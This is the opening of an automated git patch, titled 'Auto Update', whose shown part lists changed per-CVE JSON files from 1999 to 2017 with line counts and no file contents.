From 891df190762e6e3c6adca1b05103d6469b4eb378 Mon Sep 17 00:00:00 2001 From: motikan2010-bot Date: Fri, 18 Oct 2024 09:30:24 +0900 Subject: [PATCH] Auto Update 2024/10/18 00:30:24 --- 1999/CVE-1999-0016.json | 6 +- 1999/CVE-1999-0532.json | 6 +- 1999/CVE-1999-1053.json | 3 +- 2000/CVE-2000-0114.json | 9 +- 2000/CVE-2000-0170.json | 3 +- 2000/CVE-2000-0649.json | 9 +- 2000/CVE-2000-0979.json | 3 +- 2001/CVE-2001-0550.json | 3 +- 2001/CVE-2001-0680.json | 3 +- 2001/CVE-2001-0758.json | 3 +- 2001/CVE-2001-0931.json | 3 +- 2001/CVE-2001-0932.json | 3 +- 2001/CVE-2001-0933.json | 3 +- 2001/CVE-2001-0934.json | 3 +- 2001/CVE-2001-1442.json | 3 +- 2001/CVE-2001-1473.json | 3 +- 2001/CVE-2001-3389.json | 3 +- 2002/CVE-2002-0200.json | 3 +- 2002/CVE-2002-0201.json | 3 +- 2002/CVE-2002-0288.json | 3 +- 2002/CVE-2002-0289.json | 3 +- 2002/CVE-2002-0346.json | 3 +- 2002/CVE-2002-0347.json | 3 +- 2002/CVE-2002-0348.json | 3 +- 2002/CVE-2002-0448.json | 3 +- 2002/CVE-2002-0740.json | 3 +- 2002/CVE-2002-0748.json | 3 +- 2002/CVE-2002-0991.json | 3 +- 2002/CVE-2002-1614.json | 3 +- 2002/CVE-2002-20001.json | 11 +- 2002/CVE-2002-2420.json | 3 +- 2003/CVE-2003-0001.json | 3 +- 2003/CVE-2003-0172.json | 3 +- 2003/CVE-2003-0201.json | 3 +- 2003/CVE-2003-0222.json | 3 +- 2003/CVE-2003-0264.json | 18 +- 2003/CVE-2003-0282.json | 3 +- 2003/CVE-2003-0358.json | 6 +- 2004/CVE-2004-0558.json | 3 +- 2004/CVE-2004-1561.json | 12 +- 2004/CVE-2004-1769.json | 6 +- 2004/CVE-2004-2167.json | 3 +- 2004/CVE-2004-2271.json | 12 +- 2004/CVE-2004-2449.json | 3 +- 2004/CVE-2004-2549.json | 3 +- 2004/CVE-2004-2687.json | 9 +- 2004/CVE-2004-6768.json | 3 +- 2005/CVE-2005-0575.json | 3 +- 2005/CVE-2005-0603.json | 3 +- 2005/CVE-2005-1125.json | 3 +- 2005/CVE-2005-1794.json | 3 +- 2005/CVE-2005-2428.json | 3 +- 2005/CVE-2005-3299.json | 6 +- 2006/CVE-2006-0450.json | 3 +- 2006/CVE-2006-0987.json | 3 +- 2006/CVE-2006-1236.json | 3 +- 2006/CVE-2006-20001.json | 3 +- 2006/CVE-2006-2842.json | 3 +- 2006/CVE-2006-3392.json | 21 +- 2006/CVE-2006-3592.json | 3 +- 2006/CVE-2006-3747.json | 3 +- 2006/CVE-2006-4777.json | 3 +- 2006/CVE-2006-4814.json | 3 +- 2006/CVE-2006-5051.json | 9 +- 2006/CVE-2006-6184.json | 6 +- 2007/CVE-2007-0038.json | 3 +- 2007/CVE-2007-0843.json | 3 +- 2007/CVE-2007-1567.json | 3 +- 2007/CVE-2007-1858.json | 3 +- 2007/CVE-2007-2447.json | 90 ++- 2007/CVE-2007-3280.json | 3 +- 2007/CVE-2007-3830.json | 3 +- 2007/CVE-2007-3831.json | 3 +- 2007/CVE-2007-4559.json | 15 +- 2007/CVE-2007-4560.json | 3 +- 2007/CVE-2007-4607.json | 3 +- 2007/CVE-2007-5036.json | 3 +- 2007/CVE-2007-5962.json | 3 +- 2007/CVE-2007-6377.json | 3 +- 2007/CVE-2007-6638.json | 3 +- 2008/CVE-2008-0128.json | 3 +- 2008/CVE-2008-0166.json | 12 +- 2008/CVE-2008-0228.json | 3 +- 2008/CVE-2008-1611.json | 3 +- 2008/CVE-2008-1613.json | 3 +- 2008/CVE-2008-2019.json | 3 +- 2008/CVE-2008-2938.json | 3 +- 2008/CVE-2008-3531.json | 3 +- 2008/CVE-2008-4109.json | 3 +- 2008/CVE-2008-4250.json | 3 +- 2008/CVE-2008-4609.json | 3 +- 2008/CVE-2008-4654.json | 9 +- 2008/CVE-2008-4687.json | 6 +- 2008/CVE-2008-5416.json | 3 +- 2008/CVE-2008-5862.json | 3 +- 2008/CVE-2008-6806.json | 3 +- 2008/CVE-2008-6827.json | 3 +- 2008/CVE-2008-6970.json | 3 +- 2008/CVE-2008-7220.json | 3 +- 2009/CVE-2009-0182.json | 3 +- 2009/CVE-2009-0229.json | 3 +- 2009/CVE-2009-0347.json | 3 +- 2009/CVE-2009-0473.json | 3 +- 2009/CVE-2009-0689.json | 3 +- 2009/CVE-2009-1151.json | 6 +- 2009/CVE-2009-1244.json | 3 +- 2009/CVE-2009-1324.json | 3 +- 2009/CVE-2009-1330.json | 9 +- 2009/CVE-2009-1437.json | 3 +- 2009/CVE-2009-1904.json | 3 +- 2009/CVE-2009-2265.json | 12 +- 2009/CVE-2009-2692.json | 3 +- 2009/CVE-2009-2698.json | 3 +- 2009/CVE-2009-3036.json | 3 +- 2009/CVE-2009-3103.json | 9 +- 2009/CVE-2009-3555.json | 3 +- 2009/CVE-2009-4049.json | 3 +- 2009/CVE-2009-4092.json | 3 +- 2009/CVE-2009-4118.json | 3 +- 2009/CVE-2009-4137.json | 3 +- 2009/CVE-2009-4623.json | 9 +- 2009/CVE-2009-4660.json | 3 +- 2009/CVE-2009-5147.json | 6 +- 2010/CVE-2010-0219.json | 3 +- 2010/CVE-2010-0232.json | 3 +- 2010/CVE-2010-0426.json | 9 +- 2010/CVE-2010-0738.json | 6 +- 2010/CVE-2010-1205.json | 3 +- 2010/CVE-2010-1240.json | 9 +- 2010/CVE-2010-1411.json | 3 +- 2010/CVE-2010-1622.json | 12 +- 2010/CVE-2010-1938.json | 3 +- 2010/CVE-2010-2075.json | 15 +- 2010/CVE-2010-2387.json | 3 +- 2010/CVE-2010-2553.json | 3 +- 2010/CVE-2010-3124.json | 6 +- 2010/CVE-2010-3332.json | 3 +- 2010/CVE-2010-3333.json | 6 +- 2010/CVE-2010-3490.json | 3 +- 2010/CVE-2010-3600.json | 3 +- 2010/CVE-2010-3847.json | 3 +- 2010/CVE-2010-3904.json | 3 +- 2010/CVE-2010-3971.json | 3 +- 2010/CVE-2010-4221.json | 3 +- 2010/CVE-2010-4231.json | 3 +- 2010/CVE-2010-4476.json | 3 +- 2010/CVE-2010-4669.json | 3 +- 2010/CVE-2010-4804.json | 3 +- 2010/CVE-2010-5230.json | 3 +- 2010/CVE-2010-5301.json | 3 +- 2011/CVE-2011-0104.json | 3 +- 2011/CVE-2011-0228.json | 3 +- 2011/CVE-2011-1237.json | 3 +- 2011/CVE-2011-1249.json | 6 +- 2011/CVE-2011-1473.json | 6 +- 2011/CVE-2011-1475.json | 3 +- 2011/CVE-2011-1485.json | 3 +- 2011/CVE-2011-1571.json | 3 +- 2011/CVE-2011-1575.json | 3 +- 2011/CVE-2011-1720.json | 3 +- 2011/CVE-2011-1974.json | 3 +- 2011/CVE-2011-2461.json | 9 +- 2011/CVE-2011-2523.json | 57 +- 2011/CVE-2011-2894.json | 3 +- 2011/CVE-2011-3026.json | 3 +- 2011/CVE-2011-3192.json | 12 +- 2011/CVE-2011-3368.json | 6 +- 2011/CVE-2011-3389.json | 3 +- 2011/CVE-2011-3556.json | 3 +- 2011/CVE-2011-3872.json | 3 +- 2011/CVE-2011-4107.json | 3 +- 2011/CVE-2011-4862.json | 9 +- 2011/CVE-2011-4919.json | 3 +- 2011/CVE-2011-5331.json | 3 +- 2012/CVE-2012-0002.json | 3 +- 2012/CVE-2012-0003.json | 3 +- 2012/CVE-2012-0056.json | 6 +- 2012/CVE-2012-0152.json | 3 +- 2012/CVE-2012-0158.json | 6 +- 2012/CVE-2012-1495.json | 3 +- 2012/CVE-2012-1675.json | 3 +- 2012/CVE-2012-1723.json | 3 +- 2012/CVE-2012-1823.json | 15 +- 2012/CVE-2012-1870.json | 3 +- 2012/CVE-2012-1876.json | 6 +- 2012/CVE-2012-1889.json | 6 +- 2012/CVE-2012-2122.json | 9 +- 2012/CVE-2012-2593.json | 3 +- 2012/CVE-2012-2661.json | 3 +- 2012/CVE-2012-2688.json | 3 +- 2012/CVE-2012-2982.json | 39 +- 2012/CVE-2012-3137.json | 6 +- 2012/CVE-2012-3153.json | 3 +- 2012/CVE-2012-3716.json | 3 +- 2012/CVE-2012-4220.json | 6 +- 2012/CVE-2012-4431.json | 3 +- 2012/CVE-2012-4681.json | 6 +- 2012/CVE-2012-4792.json | 3 +- 2012/CVE-2012-4869.json | 6 +- 2012/CVE-2012-4929.json | 6 +- 2012/CVE-2012-5106.json | 3 +- 2012/CVE-2012-5321.json | 3 +- 2012/CVE-2012-5519.json | 3 +- 2012/CVE-2012-5575.json | 3 +- 2012/CVE-2012-5613.json | 6 +- 2012/CVE-2012-5664.json | 3 +- 2012/CVE-2012-5958.json | 3 +- 2012/CVE-2012-5960.json | 3 +- 2012/CVE-2012-6066.json | 3 +- 2012/CVE-2012-6636.json | 6 +- 2013/CVE-2013-0156.json | 18 +- 2013/CVE-2013-0212.json | 3 +- 2013/CVE-2013-0229.json | 3 +- 2013/CVE-2013-0269.json | 6 +- 2013/CVE-2013-0303.json | 3 +- 2013/CVE-2013-0333.json | 3 +- 2013/CVE-2013-1081.json | 3 +- 2013/CVE-2013-1300.json | 3 +- 2013/CVE-2013-1488.json | 3 +- 2013/CVE-2013-1491.json | 3 +- 2013/CVE-2013-1690.json | 3 +- 2013/CVE-2013-1763.json | 3 +- 2013/CVE-2013-1775.json | 3 +- 2013/CVE-2013-1965.json | 3 +- 2013/CVE-2013-2006.json | 3 +- 2013/CVE-2013-2028.json | 21 +- 2013/CVE-2013-2072.json | 3 +- 2013/CVE-2013-2094.json | 18 +- 2013/CVE-2013-2165.json | 3 +- 2013/CVE-2013-2171.json | 3 +- 2013/CVE-2013-2186.json | 9 +- 2013/CVE-2013-2217.json | 3 +- 2013/CVE-2013-225.json | 3 +- 2013/CVE-2013-2251.json | 3 +- 2013/CVE-2013-2595.json | 3 +- 2013/CVE-2013-2596.json | 3 +- 2013/CVE-2013-2597.json | 3 +- 2013/CVE-2013-2729.json | 3 +- 2013/CVE-2013-2730.json | 3 +- 2013/CVE-2013-2842.json | 3 +- 2013/CVE-2013-2977.json | 3 +- 2013/CVE-2013-3214.json | 3 +- 2013/CVE-2013-3319.json | 3 +- 2013/CVE-2013-3651.json | 3 +- 2013/CVE-2013-3660.json | 3 +- 2013/CVE-2013-3664.json | 6 +- 2013/CVE-2013-3900.json | 12 +- 2013/CVE-2013-4002.json | 3 +- 2013/CVE-2013-4175.json | 3 +- 2013/CVE-2013-4348.json | 3 +- 2013/CVE-2013-4362.json | 3 +- 2013/CVE-2013-4378.json | 6 +- 2013/CVE-2013-4434.json | 3 +- 2013/CVE-2013-4547.json | 3 +- 2013/CVE-2013-4710.json | 3 +- 2013/CVE-2013-4730.json | 3 +- 2013/CVE-2013-4784.json | 3 +- 2013/CVE-2013-4786.json | 3 +- 2013/CVE-2013-5065.json | 3 +- 2013/CVE-2013-5211.json | 18 +- 2013/CVE-2013-5664.json | 3 +- 2013/CVE-2013-5842.json | 3 +- 2013/CVE-2013-6117.json | 3 +- 2013/CVE-2013-6282.json | 12 +- 2013/CVE-2013-6375.json | 3 +- 2013/CVE-2013-6490.json | 3 +- 2013/CVE-2013-6668.json | 3 +- 2013/CVE-2013-6987.json | 3 +- 2014/CVE-2014-0038.json | 6 +- 2014/CVE-2014-0043.json | 3 +- 2014/CVE-2014-0050.json | 3 +- 2014/CVE-2014-0094.json | 6 +- 2014/CVE-2014-0114.json | 9 +- 2014/CVE-2014-0130.json | 3 +- 2014/CVE-2014-0160.json | 192 ++++-- 2014/CVE-2014-0166.json | 3 +- 2014/CVE-2014-0195.json | 3 +- 2014/CVE-2014-0196.json | 6 +- 2014/CVE-2014-0224.json | 15 +- 2014/CVE-2014-0226.json | 3 +- 2014/CVE-2014-0282.json | 3 +- 2014/CVE-2014-0291.json | 3 +- 2014/CVE-2014-0472.json | 3 +- 2014/CVE-2014-0521.json | 3 +- 2014/CVE-2014-0816.json | 3 +- 2014/CVE-2014-0993.json | 3 +- 2014/CVE-2014-10069.json | 3 +- 2014/CVE-2014-1266.json | 12 +- 2014/CVE-2014-1303.json | 3 +- 2014/CVE-2014-1322.json | 3 +- 2014/CVE-2014-1447.json | 3 +- 2014/CVE-2014-160.json | 6 +- 2014/CVE-2014-1677.json | 3 +- 2014/CVE-2014-1767.json | 3 +- 2014/CVE-2014-1773.json | 3 +- 2014/CVE-2014-1812.json | 3 +- 2014/CVE-2014-2064.json | 3 +- 2014/CVE-2014-2321.json | 6 +- 2014/CVE-2014-2323.json | 3 +- 2014/CVE-2014-2324.json | 3 +- 2014/CVE-2014-2383.json | 3 +- 2014/CVE-2014-2630.json | 3 +- 2014/CVE-2014-2734.json | 6 +- 2014/CVE-2014-2815.json | 3 +- 2014/CVE-2014-3120.json | 9 +- 2014/CVE-2014-3153.json | 29 +- 2014/CVE-2014-3341.json | 3 +- 2014/CVE-2014-3466.json | 3 +- 2014/CVE-2014-3507.json | 3 +- 2014/CVE-2014-3544.json | 3 +- 2014/CVE-2014-3551.json | 3 +- 2014/CVE-2014-3566.json | 15 +- 2014/CVE-2014-3570.json | 12 +- 2014/CVE-2014-3625.json | 6 +- 2014/CVE-2014-3704.json | 6 +- 2014/CVE-2014-4014.json | 3 +- 2014/CVE-2014-4076.json | 3 +- 2014/CVE-2014-4109.json | 3 +- 2014/CVE-2014-4113.json | 12 +- 2014/CVE-2014-4140.json | 3 +- 2014/CVE-2014-4210.json | 12 +- 2014/CVE-2014-4321.json | 3 +- 2014/CVE-2014-4322.json | 12 +- 2014/CVE-2014-4323.json | 3 +- 2014/CVE-2014-4377.json | 6 +- 2014/CVE-2014-4378.json | 3 +- 2014/CVE-2014-4481.json | 3 +- 2014/CVE-2014-4511.json | 3 +- 2014/CVE-2014-4671.json | 3 +- 2014/CVE-2014-4688.json | 3 +- 2014/CVE-2014-4699.json | 3 +- 2014/CVE-2014-4936.json | 3 +- 2014/CVE-2014-4943.json | 3 +- 2014/CVE-2014-5139.json | 6 +- 2014/CVE-2014-5284.json | 3 +- 2014/CVE-2014-5460.json | 3 +- 2014/CVE-2014-6271.json | 231 ++++--- 2014/CVE-2014-6287.json | 24 +- 2014/CVE-2014-6332.json | 9 +- 2014/CVE-2014-6577.json | 3 +- 2014/CVE-2014-6598.json | 3 +- 2014/CVE-2014-6721.json | 3 +- 2014/CVE-2014-7169.json | 9 +- 2014/CVE-2014-7205.json | 6 +- 2014/CVE-2014-7236.json | 3 +- 2014/CVE-2014-7911.json | 21 +- 2014/CVE-2014-7920.json | 6 +- 2014/CVE-2014-8110.json | 3 +- 2014/CVE-2014-8142.json | 3 +- 2014/CVE-2014-8244.json | 3 +- 2014/CVE-2014-8275.json | 6 +- 2014/CVE-2014-8609.json | 9 +- 2014/CVE-2014-8682.json | 3 +- 2014/CVE-2014-8729.json | 3 +- 2014/CVE-2014-8731.json | 3 +- 2014/CVE-2014-8757.json | 3 +- 2014/CVE-2014-9016.json | 6 +- 2014/CVE-2014-91371.json | 3 +- 2014/CVE-2014-9222.json | 6 +- 2014/CVE-2014-9295.json | 3 +- 2014/CVE-2014-9301.json | 3 +- 2014/CVE-2014-9322.json | 3 +- 2014/CVE-2014-9390.json | 3 +- 2015/CVE-2015-0006.json | 3 +- 2015/CVE-2015-0057.json | 3 +- 2015/CVE-2015-0072.json | 3 +- 2015/CVE-2015-0204.json | 15 +- 2015/CVE-2015-0205.json | 3 +- 2015/CVE-2015-0231.json | 3 +- 2015/CVE-2015-0235.json | 54 +- 2015/CVE-2015-0311.json | 3 +- 2015/CVE-2015-0313.json | 3 +- 2015/CVE-2015-0345.json | 3 +- 2015/CVE-2015-0568.json | 3 +- 2015/CVE-2015-0816.json | 3 +- 2015/CVE-2015-10034.json | 3 +- 2015/CVE-2015-1130.json | 6 +- 2015/CVE-2015-1140.json | 3 +- 2015/CVE-2015-1157.json | 3 +- 2015/CVE-2015-1318.json | 3 +- 2015/CVE-2015-1328.json | 12 +- 2015/CVE-2015-1397.json | 9 +- 2015/CVE-2015-1427.json | 12 +- 2015/CVE-2015-1474.json | 3 +- 2015/CVE-2015-1528.json | 6 +- 2015/CVE-2015-1538.json | 18 +- 2015/CVE-2015-1560.json | 3 +- 2015/CVE-2015-1578.json | 3 +- 2015/CVE-2015-1579.json | 6 +- 2015/CVE-2015-1592.json | 3 +- 2015/CVE-2015-1635.json | 39 +- 2015/CVE-2015-1641.json | 3 +- 2015/CVE-2015-1701.json | 9 +- 2015/CVE-2015-1769.json | 3 +- 2015/CVE-2015-1788.json | 3 +- 2015/CVE-2015-1790.json | 3 +- 2015/CVE-2015-1791.json | 3 +- 2015/CVE-2015-1792.json | 3 +- 2015/CVE-2015-1805.json | 15 +- 2015/CVE-2015-1855.json | 3 +- 2015/CVE-2015-1986.json | 3 +- 2015/CVE-2015-20107.json | 3 +- 2015/CVE-2015-2153.json | 3 +- 2015/CVE-2015-2166.json | 3 +- 2015/CVE-2015-2208.json | 3 +- 2015/CVE-2015-2231.json | 3 +- 2015/CVE-2015-2291.json | 6 +- 2015/CVE-2015-2315.json | 3 +- 2015/CVE-2015-2546.json | 3 +- 2015/CVE-2015-2794.json | 6 +- 2015/CVE-2015-2900.json | 3 +- 2015/CVE-2015-2925.json | 3 +- 2015/CVE-2015-3043.json | 3 +- 2015/CVE-2015-3073.json | 3 +- 2015/CVE-2015-3090.json | 3 +- 2015/CVE-2015-3145.json | 3 +- 2015/CVE-2015-3152.json | 3 +- 2015/CVE-2015-3194.json | 3 +- 2015/CVE-2015-3195.json | 3 +- 2015/CVE-2015-3197.json | 3 +- 2015/CVE-2015-3224.json | 9 +- 2015/CVE-2015-3306.json | 33 +- 2015/CVE-2015-3337.json | 3 +- 2015/CVE-2015-3456.json | 6 +- 2015/CVE-2015-3636.json | 21 +- 2015/CVE-2015-3825.json | 3 +- 2015/CVE-2015-3837.json | 3 +- 2015/CVE-2015-3839.json | 3 +- 2015/CVE-2015-3864.json | 15 +- 2015/CVE-2015-4000.json | 3 +- 2015/CVE-2015-4495.json | 3 +- 2015/CVE-2015-4843.json | 3 +- 2015/CVE-2015-4852.json | 12 +- 2015/CVE-2015-4870.json | 3 +- 2015/CVE-2015-5119.json | 9 +- 2015/CVE-2015-5195.json | 3 +- 2015/CVE-2015-5254.json | 6 +- 2015/CVE-2015-5347.json | 3 +- 2015/CVE-2015-5374.json | 3 +- 2015/CVE-2015-5377.json | 3 +- 2015/CVE-2015-5477.json | 21 +- 2015/CVE-2015-5531.json | 6 +- 2015/CVE-2015-5602.json | 6 +- 2015/CVE-2015-57115.json | 3 +- 2015/CVE-2015-5932.json | 3 +- 2015/CVE-2015-5995.json | 3 +- 2015/CVE-2015-6086.json | 3 +- 2015/CVE-2015-6095.json | 3 +- 2015/CVE-2015-6132.json | 3 +- 2015/CVE-2015-6357.json | 3 +- 2015/CVE-2015-6576.json | 3 +- 2015/CVE-2015-6606.json | 3 +- 2015/CVE-2015-6612.json | 6 +- 2015/CVE-2015-6620.json | 6 +- 2015/CVE-2015-6637.json | 3 +- 2015/CVE-2015-6639.json | 6 +- 2015/CVE-2015-6640.json | 3 +- 2015/CVE-2015-6668.json | 9 +- 2015/CVE-2015-6748.json | 3 +- 2015/CVE-2015-6835.json | 3 +- 2015/CVE-2015-6967.json | 12 +- 2015/CVE-2015-7214.json | 3 +- 2015/CVE-2015-7297.json | 9 +- 2015/CVE-2015-7501.json | 3 +- 2015/CVE-2015-7545.json | 3 +- 2015/CVE-2015-7547.json | 33 +- 2015/CVE-2015-7755.json | 6 +- 2015/CVE-2015-7808.json | 3 +- 2015/CVE-2015-8088.json | 3 +- 2015/CVE-2015-8103.json | 6 +- 2015/CVE-2015-8239.json | 3 +- 2015/CVE-2015-8277.json | 3 +- 2015/CVE-2015-8299.json | 3 +- 2015/CVE-2015-8351.json | 6 +- 2015/CVE-2015-8543.json | 3 +- 2015/CVE-2015-8562.json | 30 +- 2015/CVE-2015-8651.json | 3 +- 2015/CVE-2015-8660.json | 9 +- 2015/CVE-2015-8710.json | 3 +- 2015/CVE-2015-9235.json | 6 +- 2015/CVE-2015-9251.json | 3 +- 2016/CVE-2016-0034.json | 3 +- 2016/CVE-2016-0040.json | 6 +- 2016/CVE-2016-0049.json | 3 +- 2016/CVE-2016-0051.json | 9 +- 2016/CVE-2016-0095.json | 3 +- 2016/CVE-2016-0099.json | 3 +- 2016/CVE-2016-010033.json | 3 +- 2016/CVE-2016-0189.json | 6 +- 2016/CVE-2016-0199.json | 3 +- 2016/CVE-2016-0451.json | 3 +- 2016/CVE-2016-0638.json | 9 +- 2016/CVE-2016-0701.json | 3 +- 2016/CVE-2016-0702.json | 3 +- 2016/CVE-2016-0705.json | 3 +- 2016/CVE-2016-0728.json | 36 +- 2016/CVE-2016-0752.json | 6 +- 2016/CVE-2016-0792.json | 6 +- 2016/CVE-2016-0793.json | 3 +- 2016/CVE-2016-0800.json | 3 +- 2016/CVE-2016-0801.json | 6 +- 2016/CVE-2016-0805.json | 3 +- 2016/CVE-2016-0846.json | 6 +- 2016/CVE-2016-0974.json | 3 +- 2016/CVE-2016-1000027.json | 9 +- 2016/CVE-2016-10006.json | 3 +- 2016/CVE-2016-10033.json | 51 +- 2016/CVE-2016-10034.json | 3 +- 2016/CVE-2016-10140.json | 3 +- 2016/CVE-2016-10190.json | 3 +- 2016/CVE-2016-10191.json | 3 +- 2016/CVE-2016-10277.json | 6 +- 2016/CVE-2016-10555.json | 9 +- 2016/CVE-2016-10709.json | 3 +- 2016/CVE-2016-10761.json | 3 +- 2016/CVE-2016-10924.json | 6 +- 2016/CVE-2016-10956.json | 6 +- 2016/CVE-2016-10993.json | 3 +- 2016/CVE-2016-1240.json | 6 +- 2016/CVE-2016-1287.json | 6 +- 2016/CVE-2016-1494.json | 3 +- 2016/CVE-2016-1531.json | 3 +- 2016/CVE-2016-1542.json | 6 +- 2016/CVE-2016-1555.json | 3 +- 2016/CVE-2016-1734.json | 3 +- 2016/CVE-2016-1757.json | 3 +- 2016/CVE-2016-1764.json | 3 +- 2016/CVE-2016-1825.json | 3 +- 2016/CVE-2016-1827.json | 6 +- 2016/CVE-2016-1828.json | 12 +- 2016/CVE-2016-20012.json | 3 +- 2016/CVE-2016-2004.json | 3 +- 2016/CVE-2016-2067.json | 3 +- 2016/CVE-2016-2098.json | 33 +- 2016/CVE-2016-2107.json | 6 +- 2016/CVE-2016-2118.json | 3 +- 2016/CVE-2016-2173.json | 3 +- 2016/CVE-2016-2233.json | 3 +- 2016/CVE-2016-2334.json | 3 +- 2016/CVE-2016-2338.json | 3 +- 2016/CVE-2016-2386.json | 3 +- 2016/CVE-2016-2402.json | 6 +- 2016/CVE-2016-2431.json | 6 +- 2016/CVE-2016-2434.json | 3 +- 2016/CVE-2016-2468.json | 3 +- 2016/CVE-2016-2555.json | 6 +- 2016/CVE-2016-2569.json | 3 +- 2016/CVE-2016-2776.json | 6 +- 2016/CVE-2016-2783.json | 3 +- 2016/CVE-2016-3088.json | 18 +- 2016/CVE-2016-3113.json | 3 +- 2016/CVE-2016-3116.json | 3 +- 2016/CVE-2016-3141.json | 3 +- 2016/CVE-2016-3238.json | 3 +- 2016/CVE-2016-3308.json | 3 +- 2016/CVE-2016-3309.json | 3 +- 2016/CVE-2016-3510.json | 3 +- 2016/CVE-2016-3714.json | 18 +- 2016/CVE-2016-3749.json | 3 +- 2016/CVE-2016-3861.json | 3 +- 2016/CVE-2016-3955.json | 3 +- 2016/CVE-2016-3957.json | 3 +- 2016/CVE-2016-3959.json | 3 +- 2016/CVE-2016-3962.json | 3 +- 2016/CVE-2016-4004.json | 3 +- 2016/CVE-2016-4010.json | 6 +- 2016/CVE-2016-4014.json | 3 +- 2016/CVE-2016-4117.json | 6 +- 2016/CVE-2016-4437.json | 15 +- 2016/CVE-2016-4438.json | 6 +- 2016/CVE-2016-4463.json | 3 +- 2016/CVE-2016-4468.json | 3 +- 2016/CVE-2016-4622.json | 6 +- 2016/CVE-2016-4631.json | 3 +- 2016/CVE-2016-4655.json | 9 +- 2016/CVE-2016-4657.json | 9 +- 2016/CVE-2016-4669.json | 3 +- 2016/CVE-2016-4845.json | 3 +- 2016/CVE-2016-4861.json | 3 +- 2016/CVE-2016-4971.json | 9 +- 2016/CVE-2016-4977.json | 6 +- 2016/CVE-2016-4999.json | 3 +- 2016/CVE-2016-5195.json | 153 +++-- 2016/CVE-2016-5345.json | 3 +- 2016/CVE-2016-5394.json | 3 +- 2016/CVE-2016-5636.json | 3 +- 2016/CVE-2016-5639.json | 3 +- 2016/CVE-2016-5640.json | 6 +- 2016/CVE-2016-5696.json | 15 +- 2016/CVE-2016-5699.json | 6 +- 2016/CVE-2016-5734.json | 9 +- 2016/CVE-2016-5983.json | 3 +- 2016/CVE-2016-6187.json | 6 +- 2016/CVE-2016-6210.json | 9 +- 2016/CVE-2016-6271.json | 3 +- 2016/CVE-2016-6317.json | 3 +- 2016/CVE-2016-6366.json | 3 +- 2016/CVE-2016-6415.json | 3 +- 2016/CVE-2016-6515.json | 9 +- 2016/CVE-2016-6516.json | 3 +- 2016/CVE-2016-6584.json | 3 +- 2016/CVE-2016-6662.json | 18 +- 2016/CVE-2016-6663.json | 3 +- 2016/CVE-2016-6754.json | 3 +- 2016/CVE-2016-6798.json | 3 +- 2016/CVE-2016-6801.json | 3 +- 2016/CVE-2016-7117.json | 3 +- 2016/CVE-2016-7190.json | 3 +- 2016/CVE-2016-7200.json | 3 +- 2016/CVE-2016-7255.json | 15 +- 2016/CVE-2016-7434.json | 9 +- 2016/CVE-2016-7608.json | 3 +- 2016/CVE-2016-7855.json | 3 +- 2016/CVE-2016-8007.json | 3 +- 2016/CVE-2016-8016.json | 3 +- 2016/CVE-2016-8367.json | 3 +- 2016/CVE-2016-8462.json | 3 +- 2016/CVE-2016-8467.json | 3 +- 2016/CVE-2016-8610.json | 3 +- 2016/CVE-2016-8636.json | 3 +- 2016/CVE-2016-8655.json | 15 +- 2016/CVE-2016-8735.json | 3 +- 2016/CVE-2016-8740.json | 6 +- 2016/CVE-2016-8776.json | 3 +- 2016/CVE-2016-8823.json | 3 +- 2016/CVE-2016-8858.json | 3 +- 2016/CVE-2016-8863.json | 3 +- 2016/CVE-2016-8869.json | 9 +- 2016/CVE-2016-8870.json | 3 +- 2016/CVE-2016-9066.json | 3 +- 2016/CVE-2016-9079.json | 9 +- 2016/CVE-2016-9192.json | 3 +- 2016/CVE-2016-9244.json | 6 +- 2016/CVE-2016-9299.json | 3 +- 2016/CVE-2016-9795.json | 3 +- 2016/CVE-2016-9838.json | 3 +- 2016/CVE-2016-9920.json | 3 +- 2017/CVE-2017-0005.json | 3 +- 2017/CVE-2017-0037.json | 3 +- 2017/CVE-2017-0038.json | 3 +- 2017/CVE-2017-0055.json | 3 +- 2017/CVE-2017-0065.json | 3 +- 2017/CVE-2017-0075.json | 9 +- 2017/CVE-2017-0089.json | 3 +- 2017/CVE-2017-0100.json | 3 +- 2017/CVE-2017-0106.json | 3 +- 2017/CVE-2017-0108.json | 3 +- 2017/CVE-2017-0143.json | 12 +- 2017/CVE-2017-0144.json | 21 +- 2017/CVE-2017-0145.json | 3 +- 2017/CVE-2017-0147.json | 3 +- 2017/CVE-2017-0148.json | 3 +- 2017/CVE-2017-0199.json | 69 ++- 2017/CVE-2017-0204.json | 3 +- 2017/CVE-2017-0213.json | 24 +- 2017/CVE-2017-0248.json | 3 +- 2017/CVE-2017-0261.json | 6 +- 2017/CVE-2017-0263.json | 3 +- 2017/CVE-2017-0290.json | 3 +- 2017/CVE-2017-0358.json | 3 +- 2017/CVE-2017-0411.json | 3 +- 2017/CVE-2017-0478.json | 6 +- 2017/CVE-2017-0505.json | 3 +- 2017/CVE-2017-0541.json | 6 +- 2017/CVE-2017-0554.json | 3 +- 2017/CVE-2017-0564.json | 3 +- 2017/CVE-2017-0781.json | 18 +- 2017/CVE-2017-0785.json | 33 +- 2017/CVE-2017-0806.json | 3 +- 2017/CVE-2017-0807.json | 3 +- 2017/CVE-2017-1000000.json | 3 +- 2017/CVE-2017-1000004.json | 3 +- 2017/CVE-2017-1000028.json | 3 +- 2017/CVE-2017-1000083.json | 6 +- 2017/CVE-2017-1000112.json | 9 +- 2017/CVE-2017-1000117.json | 66 +- 2017/CVE-2017-1000170.json | 3 +- 2017/CVE-2017-1000250.json | 3 +- 2017/CVE-2017-1000251.json | 15 +- 2017/CVE-2017-1000253.json | 6 +- 2017/CVE-2017-1000353.json | 6 +- 2017/CVE-2017-1000367.json | 9 +- 2017/CVE-2017-1000371.json | 3 +- 2017/CVE-2017-1000405.json | 3 +- 2017/CVE-2017-1000475.json | 3 +- 2017/CVE-2017-1000486.json | 21 +- 2017/CVE-2017-1000499.json | 3 +- 2017/CVE-2017-1002101.json | 3 +- 2017/CVE-2017-10235.json | 3 +- 2017/CVE-2017-10271.json | 81 ++- 2017/CVE-2017-10352.json | 3 +- 2017/CVE-2017-10366.json | 3 +- 2017/CVE-2017-10617.json | 3 +- 2017/CVE-2017-10661.json | 3 +- 2017/CVE-2017-10797.json | 3 +- 2017/CVE-2017-10952.json | 3 +- 2017/CVE-2017-11176.json | 18 +- 2017/CVE-2017-11317.json | 12 +- 2017/CVE-2017-11366.json | 3 +- 2017/CVE-2017-11427.json | 3 +- 2017/CVE-2017-11503.json | 3 +- 2017/CVE-2017-11519.json | 3 +- 2017/CVE-2017-11610.json | 6 +- 2017/CVE-2017-11611.json | 3 +- 2017/CVE-2017-11774.json | 3 +- 2017/CVE-2017-11783.json | 3 +- 2017/CVE-2017-11826.json | 3 +- 